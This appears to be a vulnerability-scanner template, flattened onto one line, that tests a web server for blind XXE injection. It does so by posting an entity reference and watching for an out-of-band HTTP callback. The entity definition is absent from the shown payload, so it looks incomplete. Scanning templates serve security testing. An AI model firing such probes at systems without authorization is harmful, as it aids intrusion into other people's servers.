id: generic-blind-xxe info: name: Generic Blind XXE author: geeknik severity: high tags: xxe,generic requests: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: {{BaseURL}} &e1; matchers: - type: word part: interactsh_protocol words: - "http"